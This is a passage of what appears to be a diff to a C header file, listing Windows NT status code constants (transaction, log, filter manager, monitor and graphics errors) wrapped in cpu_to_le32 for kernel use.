+-#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
+-#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
+-#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
+-#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
+-#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
+-#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
+-#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
+-#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
+-#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
+-#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
+-#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
+-#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
+-#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
+-#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
+-#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
+-#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
+-#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
+-#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
+-#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
+-#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
+-#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
+-#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
+-#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
+-#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
+-#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
+-#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION cpu_to_le32(0xC0190053)
+-#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
+-#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
+-#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
+-#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
+-#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
+-#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
+-#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
+-#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
+-#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
+-#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
+-#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
+-#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
+-#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
+-#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
+-#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
+-#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
+-#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
+-#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
+-#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
+-#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
+-#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
+-#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
+-#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
+-#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
+-#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
+-#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
+-#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
+-#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
+-#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
+-#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
+-#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
+-#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
+-#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
+-#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
+-#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
+-#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
+-#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
+-#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
+-#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
+-#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
+-#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
+-#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
+-#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
+-#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
+-#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
+-#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
+-#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
+-#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
+-#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
+-#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
+-#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
+-#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
+-#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
+-#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
+-#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
+-#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
+-#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
+-#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
+-#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
+-#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
+-#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
+-#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
+-#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
+-#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
+-#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
+-#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
+-#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
+-#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
+-#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
+-#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
+-#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
+-#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
+-#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
+-#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
+-#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
+-#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
+-#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
+-#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
+-#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
+-#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
+-#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
+-#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
+-#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
+-#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
+-#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
+-#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
+-#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
+-#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
+-#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
+-#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK cpu_to_le32(0xC01D0006)
+-#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK cpu_to_le32(0xC01D0007)
+-#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
+-#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
+-#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
+-#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
+-#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
+-#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
+-#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
+-#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
+-#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
+-#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
+-#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
+-#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
+-#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
+-#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
+-#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
+-#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
+-#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
+-#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
+-#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
+-#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
+-#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
+-#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
+-#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
+-#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED cpu_to_le32(0xC01E0302)
+-#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
+-#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
+-#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
+-#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
+-#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE cpu_to_le32(0xC01E0310)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE cpu_to_le32(0xC01E0311)
+-#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
+-#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
+-#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
+-#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
+-#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET cpu_to_le32(0xC01E031B)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
+-#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
+-#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
+-#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION cpu_to_le32(0xC01E0325)
+-#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES cpu_to_le32(0xC01E0326)
+-#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE cpu_to_le32(0xC01E0328)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET cpu_to_le32(0xC01E0329)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E032E)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
+-#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
+-#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
+-#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
+-#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER cpu_to_le32(0xC01E0334)
+-#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
+-#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
+-#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
+-#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
+-#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
+-#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
+-#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
+-#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
+-#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
+-#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
+-#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
+-#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
+-#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT cpu_to_le32(0xC01E0341)
+-#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
+-#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
+-#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION cpu_to_le32(0xC01E0345)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED cpu_to_le32(0xC01E0346)
+-#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
+-#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
+-#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
+-#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON cpu_to_le32(0xC01E034D)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
+-#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
+-#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS cpu_to_le32(0xC01E0350)
+-#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
+-#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
+-#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
+-#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN cpu_to_le32(0xC01E0357)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT cpu_to_le32(0xC01E0358)
+-#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
+-#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION cpu_to_le32(0xC01E035A)
+-#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
+-#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
+-#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED cpu_to_le32(0xC01E0400)
+-#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
+-#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
+-#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
+-#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
+-#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
+-#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
+-#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS cpu_to_le32(0xC01E051C)
+-#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
+-#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS cpu_to_le32(0xC01E051F)
+-#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
+-#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST cpu_to_le32(0xC01E0521)
+-#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
+-#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
+-#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
+-#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
+-#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
+-#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
+-#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E0506)
+-#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E0507)
+-#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E0508)
+-#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
+-#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
+-#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
+-#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E050D)
+-#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
+-#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
+-#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
+-#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
+-#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA cpu_to_le32(0xC01E0515)
+-#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
+-#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
+-#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE cpu_to_le32(0xC01E0518)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS cpu_to_le32(0xC01E051A)
+-#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E051B)
+-#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
+-#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
+-#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
+-#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
+-#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
+-#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE cpu_to_le32(0xC01E0586)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING cpu_to_le32(0xC01E0587)
+-#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
+-#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
